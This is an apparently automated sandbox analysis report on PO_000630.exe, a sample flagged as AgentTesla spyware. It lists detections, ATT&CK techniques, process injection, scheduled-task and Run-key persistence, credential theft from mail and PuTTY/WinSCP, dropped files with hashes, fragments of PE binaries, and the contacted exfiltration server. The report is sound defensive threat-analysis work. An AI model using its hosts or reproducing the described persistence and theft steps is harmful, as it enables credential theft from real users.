                      Source: Yara matchFile source: 0.2.PO_000630.exe.4107d60.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_000630.exe.40d1b40.3.raw.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6748, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO_000630.exe PID: 6444, type: MEMORY
                      Source: Yara matchFile source: 0.2.PO_000630.exe.40d1b40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_000630.exe.4107d60.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO_000630.exe.40d1b40.3.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection312File and Directory Permissions Modification1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Registry Run Keys / Startup Folder1Scheduled Task/Job1Disable or Modify Tools1Input Capture21File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information11Credentials in Registry1System Information Discovery114SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSQuery Registry1Distributed Component Object ModelInput Capture21Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsSecurity Software Discovery321SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncVirtualization/Sandbox Evasion141Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion141Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 412581 Sample: PO_000630.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Found malware configuration 2->50 52 Multi AV Scanner detection for dropped file 2->52 54 10 other signatures 2->54 7 PO_000630.exe 6 2->7         started        11 kprUEGC.exe 2 2->11         started        13 kprUEGC.exe 1 2->13         started        process3 file4 32 C:\Users\user\AppData\Roaming\wDToQaa.exe, PE32 7->32 dropped 34 C:\Users\user\AppData\Local\...\tmp647A.tmp, XML 7->34 dropped 36 C:\Users\user\AppData\...\PO_000630.exe.log, ASCII 7->36 dropped 56 Uses schtasks.exe or at.exe to add and modify task schedules 7->56 58 Writes to foreign memory regions 7->58 60 Allocates memory in foreign processes 7->60 62 Injects a PE file into a foreign processes 7->62 15 RegSvcs.exe 2 4 7->15         started        20 schtasks.exe 1 7->20         started        22 conhost.exe 11->22         started        24 conhost.exe 13->24         started        signatures5 process6 dnsIp7 38 mail.sarojprints.com 166.62.7.52, 49743, 587 AS-26496-GO-DADDY-COM-LLCUS United States 15->38 28 C:\Users\user\AppData\Roaming\...\kprUEGC.exe, PE32 15->28 dropped 30 C:\Windows\System32\drivers\etc\hosts, ASCII 15->30 dropped 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->40 42 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->42 44 Tries to steal Mail credentials (via file access) 15->44 46 7 other signatures 15->46 26 conhost.exe 20->26         started        file8 signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO_000630.exe29%VirustotalBrowse
                      PO_000630.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\wDToQaa.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe0%MetadefenderBrowse
                      C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe0%ReversingLabs
                      C:\Users\user\AppData\Roaming\wDToQaa.exe34%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      6.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://mail.sarojprints.com0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://dnguSdly0lvcxMO8D.netP0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://XACJfd.com0%Avira URL Cloudsafe
                      http://dnguSdly0lvcxMO8D.net0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.sarojprints.com
                      166.62.7.52
                      truetrue
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://mail.sarojprints.comRegSvcs.exe, 00000006.00000002.602836446.0000000002B3F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://127.0.0.1:HTTP/1.1RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        https://api.ipify.org%GETMozilla/5.0RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        low
                        http://DynDns.comDynDNSRegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://dnguSdly0lvcxMO8D.netPRegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO_000630.exe, 00000000.00000002.351740083.0000000002DC1000.00000004.00000001.sdmpfalse
                          high
                          http://XACJfd.comRegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://dnguSdly0lvcxMO8D.netRegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipPO_000630.exe, 00000000.00000002.353447164.0000000004033000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000002.600053840.0000000000402000.00000040.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://api.ipify.org%$RegSvcs.exe, 00000006.00000002.601873571.00000000027D1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          166.62.7.52
                          mail.sarojprints.comUnited States
                          26496AS-26496-GO-DADDY-COM-LLCUStrue

                          General Information

                          Joe Sandbox Version:32.0.0 Black Diamond
                          Analysis ID:412581
                          Start date:12.05.2021
                          Start time:19:42:52
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 23s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:PO_000630.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:28
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.adwa.spyw.evad.winEXE@10/8@1/1
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          Show All
                          • Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 92.122.145.220, 52.255.188.83, 168.61.161.212, 20.50.102.62, 2.20.142.209, 2.20.143.16, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 184.30.24.56
                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          19:43:48API Interceptor1x Sleep call for process: PO_000630.exe modified
                          19:44:00API Interceptor737x Sleep call for process: RegSvcs.exe modified
                          19:44:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                          19:44:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kprUEGC C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          AS-26496-GO-DADDY-COM-LLCUS457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                          • 184.168.131.241
                          1c60a1e9_by_Libranalysis.rtfGet hashmaliciousBrowse
                          • 184.168.131.241
                          Payment Advise.exeGet hashmaliciousBrowse
                          • 148.66.136.122
                          15j1TCnOiA.xlsmGet hashmaliciousBrowse
                          • 104.238.67.22
                          INv02938727.exeGet hashmaliciousBrowse
                          • 184.168.131.241
                          ouCeNMzxAW8tbEx.exeGet hashmaliciousBrowse
                          • 166.62.10.181
                          551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          export of document 555091.xlsmGet hashmaliciousBrowse
                          • 45.40.135.135
                          fax 4044.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          generated check 8460.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          export of bill 896621.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          invoice 85046.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          bill 04050.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          copy of payment 0535.xlsmGet hashmaliciousBrowse
                          • 45.40.135.135
                          scan of fax 096859.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          scan of invoice 91510.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          export of check 684585.xlsmGet hashmaliciousBrowse
                          • 198.12.154.178
                          SWIFT COPY.exeGet hashmaliciousBrowse
                          • 107.180.1.30
                          ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                          • 184.168.131.241
                          PO-UTITECH 0511.exeGet hashmaliciousBrowse
                          • 184.168.131.241

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exePO.#4500499953.exeGet hashmaliciousBrowse
                            invoice.exeGet hashmaliciousBrowse
                              70654 SSEBACIC EGYPT.exeGet hashmaliciousBrowse
                                Booking.exeGet hashmaliciousBrowse
                                  Order - HOM-OS-20-21-5-12.exeGet hashmaliciousBrowse
                                    PO.#4500499953.exeGet hashmaliciousBrowse
                                      PO.#4500499953.exeGet hashmaliciousBrowse
                                        RFQ.exeGet hashmaliciousBrowse
                                          DHL_Telex Release BL.exeGet hashmaliciousBrowse
                                            Booking.exeGet hashmaliciousBrowse
                                              PaymentConfirmation.exeGet hashmaliciousBrowse
                                                tAe9xfvtm6kVwfA.exeGet hashmaliciousBrowse
                                                  ouCeNMzxAW8tbEx.exeGet hashmaliciousBrowse
                                                    Payment_Advice.exeGet hashmaliciousBrowse
                                                      Ningbo_Overdue_Payments.exeGet hashmaliciousBrowse
                                                        SOA.exe.gz.exeGet hashmaliciousBrowse
                                                          PO 4500379537.exeGet hashmaliciousBrowse
                                                            tAe9xfvtm6kVwfA.exeGet hashmaliciousBrowse
                                                              file.exeGet hashmaliciousBrowse
                                                                PO.#4500499953.exeGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_000630.exe.log
                                                                  Process:C:\Users\user\Desktop\PO_000630.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.355304211458859
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kprUEGC.exe.log
                                                                  Process:C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):142
                                                                  Entropy (8bit):5.090621108356562
                                                                  Encrypted:false
                                                                  SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                  MD5:8C0458BB9EA02D50565175E38D577E35
                                                                  SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                  SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                  SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                  C:\Users\user\AppData\Local\Temp\tmp647A.tmp
                                                                  Process:C:\Users\user\Desktop\PO_000630.exe
                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1652
                                                                  Entropy (8bit):5.153525803961435
                                                                  Encrypted:false
                                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3UZtn:cbha7JlNQV/rydbz9I3YODOLNdq36b
                                                                  MD5:5040AB5E913A62C131B7AA1EE30C82FF
                                                                  SHA1:B1E83AE6E25DEE888D086484FBA5D7251B4CE287
                                                                  SHA-256:BB23BEEB9F8707D112F78D73B7E464AEC12FC540EF5D30478BE1EF7D32370D9B
                                                                  SHA-512:6E491F9F45CF4E2EFC160F0257A8B34F788A1CAD2002A201BDFD3FB3E73B098231E1B1FE3F1D8C4FFAD110A3A000EC34C7EBB26654F8BBEEF79CC282ACE02692
                                                                  Malicious:true
                                                                  Reputation:low
                                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
                                                                  C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe
                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):45152
                                                                  Entropy (8bit):6.149629800481177
                                                                  Encrypted:false
                                                                  SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                                  MD5:2867A3817C9245F7CF518524DFD18F28
                                                                  SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                                  SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                                  SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: PO.#4500499953.exe, Detection: malicious, Browse
                                                                  • Filename: invoice.exe, Detection: malicious, Browse
                                                                  • Filename: 70654 SSEBACIC EGYPT.exe, Detection: malicious, Browse
                                                                  • Filename: Booking.exe, Detection: malicious, Browse
                                                                  • Filename: Order - HOM-OS-20-21-5-12.exe, Detection: malicious, Browse
                                                                  • Filename: PO.#4500499953.exe, Detection: malicious, Browse
                                                                  • Filename: PO.#4500499953.exe, Detection: malicious, Browse
                                                                  • Filename: RFQ.exe, Detection: malicious, Browse
                                                                  • Filename: DHL_Telex Release BL.exe, Detection: malicious, Browse
                                                                  • Filename: Booking.exe, Detection: malicious, Browse
                                                                  • Filename: PaymentConfirmation.exe, Detection: malicious, Browse
                                                                  • Filename: tAe9xfvtm6kVwfA.exe, Detection: malicious, Browse
                                                                  • Filename: ouCeNMzxAW8tbEx.exe, Detection: malicious, Browse
                                                                  • Filename: Payment_Advice.exe, Detection: malicious, Browse
                                                                  • Filename: Ningbo_Overdue_Payments.exe, Detection: malicious, Browse
                                                                  • Filename: SOA.exe.gz.exe, Detection: malicious, Browse
                                                                  • Filename: PO 4500379537.exe, Detection: malicious, Browse
                                                                  • Filename: tAe9xfvtm6kVwfA.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: PO.#4500499953.exe, Detection: malicious, Browse
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                  C:\Users\user\AppData\Roaming\wDToQaa.exe
                                                                  Process:C:\Users\user\Desktop\PO_000630.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):768512
                                                                  Entropy (8bit):7.310867886556554
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4qxxoLLoS60/K7yh0R8wRLyVKRpGnBo0iL5PgQiaJEDmGEXUqjmPNL:4soLAR84RpGnBotPgQzJCPPNL
                                                                  MD5:1FB20B0D0B5817E8485171B8271D2709
                                                                  SHA1:132DA2B67821A3E8168088ECB74E5A5C05DF9B6C
                                                                  SHA-256:05C744B20DF523CA0EBD41C0B9F43474FDF52754DD65B87BD5C0CF32CC2E8B88
                                                                  SHA-512:AA4DA61E0153432F8206A33D5C835EFD348A481776F8043E7704E36A19AB8740947D27B95EF6C2D25DE98FE8750E82157A14853C352B3AAC925F869DCCAF0734
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 34%
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. ....................... ............@.................................@...O...................................$................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................t.......H.......0`..Lp..........|...............................................".(.....*^..}.....(.......(.....*....0.............{....o......(.........,..r...p(....&.Yr'..p.rc..p(....s......o....&ri..p(....&.{....r...po ..........o!...(".....o!...(....&...*.........de........*&..(#....*R..(#....s>...($....*...0..+.........,..{.......+....,...{....o%.......(&....*..0............s'...}.....s(...}.....s)...}.....s*...}.....s+...}.....s+...}.....s+...}.....{....o,.....(,.....{.....o-..
                                                                  C:\Windows\System32\drivers\etc\hosts
                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):11
                                                                  Entropy (8bit):2.663532754804255
                                                                  Encrypted:false
                                                                  SSDEEP:3:iLE:iLE
                                                                  MD5:B24D295C1F84ECBFB566103374FB91C5
                                                                  SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                                                  SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
